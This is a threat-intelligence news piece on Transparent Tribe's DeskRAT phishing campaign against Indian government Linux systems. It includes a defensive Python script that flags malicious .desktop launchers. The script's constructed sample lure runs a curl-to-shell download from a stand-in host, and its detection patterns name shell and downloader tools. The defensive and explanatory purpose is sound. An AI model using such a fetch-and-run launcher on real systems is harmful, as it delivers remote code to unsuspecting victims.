A threat actor with ties to Pakistan has been targeting Indian government entities through spear-phishing attacks to distribute a Golang-based malware called DeskRAT.
The activity, observed in August and September 2025 by Sekoia, has been associated with Transparent Tribe (also known as APT36), a state-sponsored hacking group active since at least 2013. The campaign builds upon a previous disclosure by CYFIRMA in August 2025.
The attack chain starts with a phishing email carrying a ZIP attachment, or a link to an archive hosted on a legitimate cloud service such as Google Drive. The ZIP contains a malicious .desktop launcher (a Linux desktop entry file) that runs the main payload while opening a decoy PDF in Mozilla Firefox, so the victim sees only the expected document.
The malware targets BOSS (Bharat Operating System Solutions) Linux systems, communicates with its command-and-control (C2) server over WebSockets, and supports several persistence methods.
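A triage check for the lure described above, as an added example that is not code from the article or from any of the vendors it cites: it unpacks a ZIP, parses every .desktop entry it finds, and flags launcher characteristics consistent with a document-themed decoy (a document-like display name, a shell wrapper in Exec, chained commands, a PDF viewer launched beside another command, and downloader or decoder utilities). The sample archive, file names and the heuristics themselves are constructed assumptions, not the real campaign artifacts or any vendor's detection logic.

```python
import io
import re
import zipfile
from configparser import ConfigParser, Error as ConfigParserError

# Constructed sample (hypothetical names, not real campaign artifacts): a
# launcher that opens a decoy PDF in Firefox and runs a second command.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "firefox /tmp/decoy.pdf & curl -s http://example.invalid/stage | sh"
"""


def build_sample_zip() -> bytes:
    """Build an in-memory ZIP resembling a phishing attachment (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Meeting_Notice.pdf.desktop", SAMPLE_DESKTOP)
        zf.writestr("readme.txt", "nothing to see")
    return buf.getvalue()


# Assumed heuristics for a document-themed launcher lure.
SHELL_WRAPPER = re.compile(r"\b(sh|bash|dash|zsh)\s+-c\b")
CHAINING = re.compile(r"(&&|\|\||;|\||&)")
DOWNLOADER = re.compile(r"\b(curl|wget|python3?|base64|nohup|chmod)\b")
VIEWER_WITH_PDF = re.compile(r"\b(firefox|xdg-open|evince|okular)\b[^;&|]*\.pdf", re.I)
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)


def analyze_desktop_entry(name: str, text: str) -> list[str]:
    """Return a list of findings for one .desktop file; empty means nothing suspicious."""
    cp = ConfigParser(interpolation=None, strict=False)  # values may contain % and duplicates
    try:
        cp.read_string(text)
    except ConfigParserError:
        return [f"{name}: unparsable desktop entry"]
    if not cp.has_section("Desktop Entry"):
        return []
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    display = entry.get("Name", "")

    findings = []
    # A launcher whose visible name or file name ends in a document extension.
    if DOC_EXT.search(display) or DOC_EXT.search(name.removesuffix(".desktop")):
        findings.append("document-like display name on a launcher")
    if SHELL_WRAPPER.search(exec_line):
        findings.append("Exec wraps a shell (-c)")
    if CHAINING.search(exec_line):
        findings.append("Exec chains multiple commands")
    # Decoy pattern: a PDF is opened in a viewer while something else runs.
    if VIEWER_WITH_PDF.search(exec_line) and CHAINING.search(exec_line):
        findings.append("opens a PDF decoy alongside another command")
    if DOWNLOADER.search(exec_line):
        findings.append("Exec references a downloader/decoder utility")
    return [f"{name}: {f}" for f in findings]


def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Scan every .desktop member of a ZIP; map member name -> findings."""
    report: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".desktop"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = analyze_desktop_entry(info.filename, text)
            if hits:
                report[info.filename] = hits
    return report


if __name__ == "__main__":
    for fname, hits in scan_zip(build_sample_zip()).items():
        print(fname)
        for hit in hits:
            print("  -", hit)
```

A single finding (a PDF viewer launched on its own, say) is normal for a legitimate launcher; the combination of a document-like name with a shell wrapper, chaining and a downloader is what should raise an alert. Run it against mail-gateway quarantines or user download directories rather than trusting the file extension.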
DeskRAT supports five commands: ping, heartbeat, browse_files, start_collection, and upload_execute. Their names indicate keep-alive, file system browsing, data collection, and upload-and-execute functionality.
The operators refer to the C2 servers as stealth servers. The campaign has also shifted from cloud storage platforms such as Google Drive to dedicated staging servers for hosting the archives.
Further investigation by QiAnXin XLab uncovered Windows and Linux variants of a backdoor known as StealthServer, indicating that the threat actor is pursuing a cross-platform toolset.
Separately, recent campaigns by threat actors in South and East Asia have targeted a range of sectors with custom malware and phishing techniques.
One such actor, Mysterious Elephant, has grown more sophisticated, building its own malware tools and showing technical expertise in developing advanced malware.
The group poses a significant threat to government entities in the Asia-Pacific region, underscoring the need for stronger defensive measures.